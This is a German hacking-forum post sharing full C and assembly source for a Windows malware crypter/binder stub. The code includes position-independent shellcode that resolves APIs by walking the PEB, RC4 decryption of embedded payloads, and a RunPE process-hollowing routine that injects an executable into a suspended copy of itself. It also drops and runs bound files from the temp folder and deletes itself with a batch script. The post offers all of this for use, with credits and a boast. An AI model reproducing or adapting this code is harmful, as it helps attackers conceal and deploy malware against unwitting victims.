"\x5D\xE0\x89\x4D\xE4\x31\xC0\x31\xDB\x31\xC9\x64\x 8B\x71\x30\x8B"
"\x76\x0C\x8B\x76\x1C\x8B\x46\x08\x8B\x7E\x20\x8B\x 36\x38\x4F\x18"
"\x75\xF3\x89\x45\xEC\x89\xC6\x03\x70\x3C\x89\x75\x F0\x83\xC6\x78"
"\x03\x06\x89\x45\xF8\x8B\x5D\xEC\x03\x58\x20\x89\x 5D\xF4\x8B\x7D"
"\xF4\x31\xC9\x8B\x5D\xEC\x03\x1F\x81\x3B\x47\x65\x 74\x50\x74\x06"
"\x83\xC7\x04\x41\xEB\xED\x81\x7B\x04\x72\x6F\x63\x 41\x74\x06\x83"
"\xC7\x04\x41\xEB\xDE\x89\xCF\x8B\x45\xF8\x8B\x5D\x EC\x83\xC0\x24"
"\x03\x18\xD1\xC1\x01\xCB\x31\xC9\x0F\xB7\x0B\xC1\x C1\x02\x8B\x45"
"\xF8\x8B\x5D\xEC\x83\xC0\x1C\x03\x18\x01\xCB\x8B\x 03\x03\x45\xEC"
"\x89\x45\xE8\xFF\x75\xE4\xFF\x75\xEC\xFF\x55\xE8\x FF\x75\xDC\xFF"
"\xD0\xFF\x75\xE0\x50\xFF\x55\xE8\xC9\xC3";
typedef struct _RESSOURCE_STRCT
{
CHAR* ReadByte;
DWORD ReadByteSize;
} RESSOURCE_STRCT, *PRESSOURCE_STRCT;
typedef LPVOID (__stdcall* HeapAllocF)(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
typedef DWORD (__stdcall* ResumeThreadF)(HANDLE hThread);
typedef LPVOID (__stdcall* LockResourceF)(HGLOBAL hResData);
typedef HANDLE (__stdcall* GetProcessHeapF)(VOID);
typedef VOID* (__stdcall* VirtualAllocExF)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef BOOL (__stdcall* CreateProcessAF)(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);;
typedef VOID (__stdcall* RtlMoveMemoryF)(VOID UNALIGNED *Destination, CONST VOID UNALIGNED *Source, SIZE_T Length);
typedef HRSRC (__stdcall* FindResourceAF)(HMODULE hModule, LPCSTR lpName, LPCSTR lpType);
typedef HGLOBAL (__stdcall* LoadResourceF)(HMODULE hModule,HRSRC hResInfo);
typedef DWORD (__stdcall* SizeOfResourceF)(HMODULE hModule, HRSRC hResInfo);
typedef BOOL (__stdcall* GetThreadContextF)(HANDLE hThread, LPCONTEXT lpContext);
typedef BOOL (__stdcall* SetThreadContextF)(HANDLE hThread, CONST CONTEXT *lpContext);
typedef DWORD (__stdcall* GetModuleFileNameF)(HMODULE hModule, LPCH lpFilename, DWORD nSize);
typedef BOOL (__stdcall* NtWriteVirtualMemoryF)(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten);
typedef LONG (__stdcall* NtUnmapViewOfSectionF)(HANDLE ProcessHandle, PVOID BaseAddress);
typedef DWORD (__stdcall* GetEnvironmentVariableAF)(LPCSTR lpName, LPSTR lpBuffer, DWORD nSize);
typedef HINSTANCE (__stdcall* ShellExecuteF)(HWND hwnd, LPCTSTR lpOperation, LPCTSTR lpFile, LPCTSTR lpParameters, LPCTSTR lpDirectory, INT nShowCmd);
typedef HANDLE (__stdcall* CreateFileF)(LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
typedef BOOL (__stdcall* WriteFileF)(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
typedef BOOL (__stdcall* CloseHandleF)(HANDLE hObject);
typedef LPSTR (__stdcall* lstrcatAF)(LPSTR lpString1, LPCSTR lpString2);
typedef VOID (__stdcall* ExitProcessF)(UINT uExitCode);
lstrcatAF lstrcatA_;
HeapAllocF HeapAlloc_;
WriteFileF WriteFile_;
CreateFileF CreateFile_;
CloseHandleF CloseHandle_;
ExitProcessF ExitProcess_;
ResumeThreadF ResumeThread_;
LockResourceF LockResource_;
LoadResourceF LoadResource_;
ShellExecuteF ShellExecute_;
RtlMoveMemoryF RtlMoveMemory_;
FindResourceAF FindResource_;
SizeOfResourceF SizeOfResource_;
GetProcessHeapF GetProcessHeap_;
VirtualAllocExF VirtualAllocEx_;
CreateProcessAF CreateProcessA_;
GetThreadContextF GetThreadContext_;
SetThreadContextF SetThreadContext_;
GetModuleFileNameF GetModuleFileName_;
NtWriteVirtualMemoryF NtWriteVirtualMemory_;
NtUnmapViewOfSectionF NtUnmapViewOfSection_;
GetEnvironmentVariableAF GetEnvironmentVariableA_;
VOID SetupAPI(CONST CHAR* DLLName, CONST CHAR* FunctionName, LPVOID WriteVar);
LPBYTE RC4(LPBYTE lpBuf, LPBYTE lpKey, DWORD dwBufLen, DWORD dwKeyLen);
PRESSOURCE_STRCT LoadResourceData(INT INT_RES, CONST CHAR* RS_NAME);
VOID BinderExecute(PRESSOURCE_STRCT ResStruct);
DWORD RunPE(LPBYTE InjectByte);
LPVOID GetAddr(LPVOID String);
VOID MeltFile(VOID);
VOID GetAPIAddr();
INT WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, INT nShowCmd)
{
PRESSOURCE_STRCT OptionsResStrc = 0;
PRESSOURCE_STRCT InjectResStrc = 0;
PRESSOURCE_STRCT BindResStrc = 0;
GetAPIAddr();
OptionsResStrc = LoadResourceData(101, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
//OptionsResStrc->ReadByte = (CHAR*)RC4((LPBYTE)OptionsResStrc->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), OptionsResStrc->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);
InjectResStrc = LoadResourceData(102, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
BindResStrc = LoadResourceData(103, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
if(BindResStrc->ReadByteSize != 0)
{
BinderExecute(BindResStrc);
};
//InjectResStrc->ReadByte = (CHAR*)RC4((LPBYTE)InjectResStrc->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), InjectResStrc->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);
RunPE((LPBYTE)InjectResStrc->ReadByte);
if(OptionsResStrc->ReadByte[0] == '1')
{
MeltFile();
};
return 0;
};
VOID MeltFile(VOID)
{
CHAR* MyPath = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
GetModuleFileName_(NULL, MyPath, MAX_PATH);
CHAR* NewPath = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
GetEnvironmentVariableA_((LPCSTR)GetAddr(&TEMP_VAR), NewPath, MAX_PATH);
lstrcatA_(NewPath, (CHAR*)GetAddr(&BACKSPACE_STR));
CHAR* BATCH_DATA = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, 1024);
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH1));
lstrcatA_(BATCH_DATA, MyPath);
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH2));
lstrcatA_(BATCH_DATA, MyPath);
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH3));
lstrcatA_(BATCH_DATA, NewPath);
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&RESOURCE_NAME));
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&BATCH));
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH4));
lstrcatA_(BATCH_DATA, NewPath);
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&RESOURCE_NAME));
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&BATCH));
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH5));
lstrcatA_(NewPath, (CHAR*)GetAddr(&RESOURCE_NAME));
lstrcatA_(NewPath, (CHAR*)GetAddr(&BATCH));
HANDLE hFile = CreateFile_((LPCSTR)NewPath, GENERIC_WRITE, 0, 0, CREATE_NEW, NULL, NULL);
DWORD dwWritten = 0;
DWORD nSize = 0;
do
{
nSize++;
}
while(BATCH_DATA[nSize] != '\0');
WriteFile_(hFile, BATCH_DATA, nSize, &dwWritten, NULL);
CloseHandle_(hFile);
ShellLoop:
if((INT)ShellExecute_(NULL, (LPCSTR)GetAddr(&SHELL_CMD), NewPath, NULL, NULL, 0) < 32)
{
goto ShellLoop;
};
ExitProcess_(ERROR_SUCCESS);
return;
};
VOID BinderExecute(PRESSOURCE_STRCT ResStruct)
{
DWORD I = 0;
for(I = 1; I < ResStruct->ReadByteSize * 2; I++)
{
CHAR* TempPath = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
GetEnvironmentVariableA_((LPCSTR)GetAddr(&TEMP_VAR), TempPath, MAX_PATH);
PRESSOURCE_STRCT BinderStruct = 0;
BinderStruct = LoadResourceData(103 + I, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
BinderStruct->ReadByte = (CHAR*)RC4((LPBYTE)BinderStruct->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), BinderStruct->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);
PRESSOURCE_STRCT BindStruct2 = 0;
BindStruct2 = LoadResourceData(103 + I + 1, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
BindStruct2->ReadByte = (CHAR*)RC4((LPBYTE)BindStruct2->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), BindStruct2->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);
lstrcatA_(TempPath, (CHAR*)GetAddr(BACKSPACE_STR));
lstrcatA_(TempPath, BindStruct2->ReadByte);
HANDLE hFile = CreateFile_((LPCSTR)TempPath, GENERIC_WRITE, 0, 0, CREATE_NEW, NULL, NULL);
DWORD dwWritten = 0;
WriteFile_(hFile, BinderStruct->ReadByte, BinderStruct->ReadByteSize, &dwWritten, NULL);
CloseHandle_(hFile);
ShellExecute_(NULL, (LPCSTR)GetAddr(&SHELL_CMD), TempPath, NULL, NULL, 5);
I++;
};
return;
};
LPVOID GetAddr(LPVOID String)
{
LPVOID RTChar = 0;
_asm CALL DELTA
DELTA:
_asm POP EBX
_asm SUB EBX, OFFSET DELTA
_asm MOV ESI, String
_asm LEA EAX, [EBX + ESI]
_asm MOV RTChar, EAX
return RTChar;
};
PRESSOURCE_STRCT LoadResourceData(INT INT_RES, CONST CHAR* RS_NAME)
{
HRSRC hRsrc = 0;
CHAR* lpFile = 0;
HGLOBAL hGlob = 0;
DWORD dwFileSize = 0;
PRESSOURCE_STRCT uResStrt;
uResStrt = (PRESSOURCE_STRCT)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(RESSOURCE_STRCT));
hRsrc = FindResource_(NULL, MAKEINTRESOURCE(INT_RES), RS_NAME);
dwFileSize = SizeOfResource_(NULL, hRsrc);
hGlob = LoadResource_(NULL, hRsrc);
lpFile = (CHAR*)LockResource_(hGlob);
uResStrt->ReadByte = (CHAR*)HeapAlloc_(GetProcessHeap_(), NULL, dwFileSize);
RtlMoveMemory_(uResStrt->ReadByte, lpFile, dwFileSize);
uResStrt->ReadByte[dwFileSize] = '\0';
uResStrt->ReadByteSize = dwFileSize;
return uResStrt;
};
LPBYTE RC4(LPBYTE lpBuf, LPBYTE lpKey, DWORD dwBufLen, DWORD dwKeyLen)
{
INT A = 0, B = 0, S[256];
BYTE Swap;
DWORD dwCount;
for(A = 0; A < 256; A++)
{
S[A] = A;
};
for(A = 0; A < 256; A++)
{
B = (B + S[A] + lpKey[A % dwKeyLen]) % 256;
Swap = S[A];
S[A] = S[B];
S[B] = Swap;
};
A = 0;
B = 0;
for(dwCount = 0; dwCount < dwBufLen; dwCount++)
{
A = (A + 1) % 256;
B = (B + S[A]) % 256;
Swap = S[A];
S[A] = S[B];
S[B] = Swap;
lpBuf[dwCount] ^= S[(S[A] + S[B]) % 256];
};
return lpBuf;
};
VOID SetupAPI(CONST CHAR* DLLName, CONST CHAR* FunctionName, LPVOID WriteVar)
{
DWORD AddressOfAPI_Shell = (DWORD)GetAddr(API_SHELL);
CHAR* LoadLibStr = (CHAR*)GetAddr(LOADLIBRARYA_STR);
LPVOID vVAR = GetAddr(WriteVar);
_asm PUSHAD
_asm MOV EAX, DLLName
_asm MOV EBX, FunctionName
_asm MOV ECX, LoadLibStr
_asm CALL AddressOfAPI_Shell
_asm MOV EDI, vVAR
_asm MOV [EDI], EAX
return;
};
DWORD RunPE(LPBYTE InjectByte)
{
LONG I = 0;
CHAR* HostFile = 0;
CONTEXT* tCONTEXT = 0;
STARTUPINFO* tSTARTUPINFO = 0;
IMAGE_DOS_HEADER* tIMAGE_DOS_HEADER = 0;
IMAGE_NT_HEADERS* tIMAGE_NT_HEADERS = 0;
PROCESS_INFORMATION* tPROCESS_INFORMATION = 0;
IMAGE_SECTION_HEADER* tIMAGE_SECTION_HEADER = 0;
HostFile = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
tCONTEXT = (CONTEXT*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(CONTEXT));
tSTARTUPINFO = (STARTUPINFO*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(STARTUPINFO));
tIMAGE_DOS_HEADER = (IMAGE_DOS_HEADER*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(IMAGE_DOS_HEADER));
tIMAGE_NT_HEADERS = (IMAGE_NT_HEADERS*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(IMAGE_NT_HEADERS));
tPROCESS_INFORMATION = (PROCESS_INFORMATION*)HeapAlloc_(GetProcessHeap_() , HEAP_ZERO_MEMORY, sizeof(PROCESS_INFORMATION));
tIMAGE_SECTION_HEADER = (IMAGE_SECTION_HEADER*)HeapAlloc_(GetProcessHeap_( ), HEAP_ZERO_MEMORY, sizeof(IMAGE_SECTION_HEADER));
tCONTEXT->ContextFlags = CONTEXT_FULL;
tSTARTUPINFO->cb = sizeof(STARTUPINFO);
GetModuleFileName_(NULL, HostFile, MAX_PATH);
tIMAGE_DOS_HEADER = (IMAGE_DOS_HEADER*)&InjectByte[0];
tIMAGE_NT_HEADERS = (IMAGE_NT_HEADERS*)&InjectByte[tIMAGE_DOS_HEADER->e_lfanew];
if(CreateProcessA_(HostFile, NULL, NULL, NULL, NULL, CREATE_SUSPENDED, NULL, NULL, tSTARTUPINFO, tPROCESS_INFORMATION))
{
NtUnmapViewOfSection_(tPROCESS_INFORMATION->hProcess, (LPVOID)tIMAGE_NT_HEADERS->OptionalHeader.ImageBase);
VirtualAllocEx_(tPROCESS_INFORMATION->hProcess, (LPVOID)tIMAGE_NT_HEADERS->OptionalHeader.ImageBase, tIMAGE_NT_HEADERS->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
NtWriteVirtualMemory_(tPROCESS_INFORMATION->hProcess, (LPVOID)tIMAGE_NT_HEADERS->OptionalHeader.ImageBase, &InjectByte[0], tIMAGE_NT_HEADERS->OptionalHeader.SizeOfHeaders, NULL);
for(I = 0; I < tIMAGE_NT_HEADERS->FileHeader.NumberOfSections; I++)
{
tIMAGE_SECTION_HEADER = (IMAGE_SECTION_HEADER*)HeapAlloc_(GetProcessHeap_( ), HEAP_ZERO_MEMORY, sizeof(IMAGE_SECTION_HEADER));
tIMAGE_SECTION_HEADER = (IMAGE_SECTION_HEADER*)&InjectByte[tIMAGE_DOS_HEADER->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * I];
NtWriteVirtualMemory_(tPROCESS_INFORMATION->hProcess, (LPVOID)(tIMAGE_NT_HEADERS->OptionalHeader.ImageBase + tIMAGE_SECTION_HEADER->VirtualAddress), &InjectByte[tIMAGE_SECTION_HEADER->PointerToRawData], tIMAGE_SECTION_HEADER->SizeOfRawData, NULL);
};
GetThreadContext_(tPROCESS_INFORMATION->hThread, tCONTEXT);
DWORD eImage = tIMAGE_NT_HEADERS->OptionalHeader.ImageBase;
DWORD eEntry = tIMAGE_NT_HEADERS->OptionalHeader.AddressOfEntryPoint;
NtWriteVirtualMemory_(tPROCESS_INFORMATION->hProcess, &eEntry, HeapAlloc_(GetProcessHeap_(), NULL, sizeof(DWORD)), sizeof(DWORD), NULL);
_asm MOV EAX, eImage
_asm ADD EAX, eEntry
DWORD eEAX = 0;
_asm MOV eEAX, EAX
tCONTEXT->Eax = eEAX;
SetThreadContext_(tPROCESS_INFORMATION->hThread, tCONTEXT);
ResumeThread_(tPROCESS_INFORMATION->hThread);
return tPROCESS_INFORMATION->dwProcessId;
};
return 0;
};
VOID GetAPIAddr()
{
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&LSTRCATA_STR), &lstrcatA_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&HEAPALLOC_STR), &HeapAlloc_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&WRITEFILE_STR), &WriteFile_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&CREATEFILE_STR), &CreateFile_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&CLOSEHANDLE_STR), &CloseHandle_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&EXITPROCESS_STR), &ExitProcess_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&LOADRESOURCE_STR), &LoadResource_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&RESUMETHREAD_STR), &ResumeThread_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&LOCKRESOURCE_STR), &LockResource_);
SetupAPI((CONST CHAR*)GetAddr(&SHELL32_STR ), (CONST CHAR*)GetAddr(&SHELLEXECUTE_STR), &ShellExecute_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&RTLMOVEMEMORY_STR), &RtlMoveMemory_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&FINDRESOURCEA_STR), &FindResource_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&SIZEOFRESOURCE_STR), &SizeOfResource_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETPROCESSHEAP_STR), &GetProcessHeap_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&VIRTUALALLOCEX_STR), &VirtualAllocEx_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&CREATEPROCESSA_STR), &CreateProcessA_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETTHREADCONTEXT_STR), &GetThreadContext_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&SETTHREADCONTEXT_STR), &SetThreadContext_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETMODULEFILENAMEA_STR), &GetModuleFileName_);
SetupAPI((CONST CHAR*)GetAddr(&NTDLLDLL_STR ), (CONST CHAR*)GetAddr(&NTWRITEVIRTUALMEMORY_STR), &NtWriteVirtualMemory_);
SetupAPI((CONST CHAR*)GetAddr(&NTDLLDLL_STR ), (CONST CHAR*)GetAddr(&NTUNMAPVIEWOFSECTION_STR), &NtUnmapViewOfSection_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETENVIROMENTVARIABLE_STR), &GetEnvironmentVariableA_);
return;
};
Hier das Api Shell (Asm), vermutlich die Ursache für die x64 Bugs:
;SetupAPI Shell
;GetProcAddress & LoadLibraryA-Replacement
;
;Usage:
;EAX = Pointer to DLL-Name
;EBX = Pointer to Function-Name
;ECX = Pointer to "LoadLibraryA" (String)
;
include "H:\FASM\INCLUDE\WIN32AX.INC"
USE32
CALL ShellCode
RET
proc ShellCode
locals
DLLName DD ?
FunctionName DD ?
LoadLibraryA DD ?
ListGPA DD ?
mzKernel DD ?
peKernel DD ?
anKernel DD ?
etKernel DD ?
ProcAddr DD ?
endl
ShellBegin:
MOV [DLLName], EAX
MOV [FunctionName], EBX
MOV [LoadLibraryA], ECX
XOR EAX, EAX
XOR EBX, EBX
XOR ECX, ECX
MOV ESI, DWORD[FS:ECX+30h]
MOV ESI, DWORD[ESI+0Ch]
MOV ESI, DWORD[ESI+1Ch]
KernelMark:
MOV EAX, DWORD[ESI+8]
MOV EDI, DWORD[ESI+20h]
MOV ESI, DWORD[ESI]
CMP BYTE[EDI+18h], CL
JNE KernelMark
MOV [mzKernel], EAX
MOV ESI, EAX
ADD ESI, DWORD[EAX+0x3C]
MOV [peKernel], ESI
ADD ESI, 0x78
ADD EAX, DWORD[ESI]
MOV [etKernel], EAX
MOV EBX, [mzKernel]
ADD EBX, DWORD[EAX+0x20]
MOV [anKernel], EBX
MOV EDI, [anKernel]
XOR ECX, ECX
LIST_GPA:
MOV EBX, [mzKernel]
ADD EBX, DWORD[EDI]
CMP DWORD[EBX], 'GetP'
JE GOT_PROC1
ADD EDI, 4
INC ECX
JMP LIST_GPA
GOT_PROC1:
CMP DWORD[EBX+4], 'rocA'
JE GOT_PROC2
ADD EDI, 4
INC ECX
JMP LIST_GPA
GOT_PROC2:
MOV EDI, ECX
MOV EAX, DWORD[etKernel]
MOV EBX, DWORD[mzKernel]
ADD EAX, 0x24
ADD EBX, DWORD[EAX]
ROL ECX, 1
ADD EBX, ECX
XOR ECX, ECX
MOVZX ECX, WORD[EBX]
ROL ECX, 2
MOV EAX, DWORD[etKernel]
MOV EBX, DWORD[mzKernel]
ADD EAX, 0x1C
ADD EBX, DWORD[EAX]
ADD EBX, ECX
MOV EAX, DWORD[EBX]
ADD EAX, DWORD[mzKernel]
MOV[ListGPA], EAX
PUSH [LoadLibraryA]
PUSH DWORD[mzKernel]
CALL DWORD[ListGPA]
PUSH [DLLName]
CALL EAX
PUSH [FunctionName]
PUSH EAX
CALL DWORD[ListGPA]
LEAVE
RET
endp
Und hier das in MASM kompilierbare Dump woraus ich den Shellcode erstellt habe (von mir, Tjak, gekürzt, weil der Text zu lang wäre):
http://nopaste.free-hack.com/index.php?id=b4504e9c86
Viel Spaß hrhr
Credits gehen noch an e0n (hackhound) hatte mal ne vorlage für das Api Shell genutzt.
Rest ist 100% selfcoded.
Hoffe ihr schätzt meine Arbeit hrhr^^
http://hba-crew.to/images/smilies/thx.png
Quelle: M4x Maximus aka Cyberterrorist M4x (Coder) von HBA-Crew - Thread-Link (http://hba-crew.to/showthread.php?p=101917#post101917)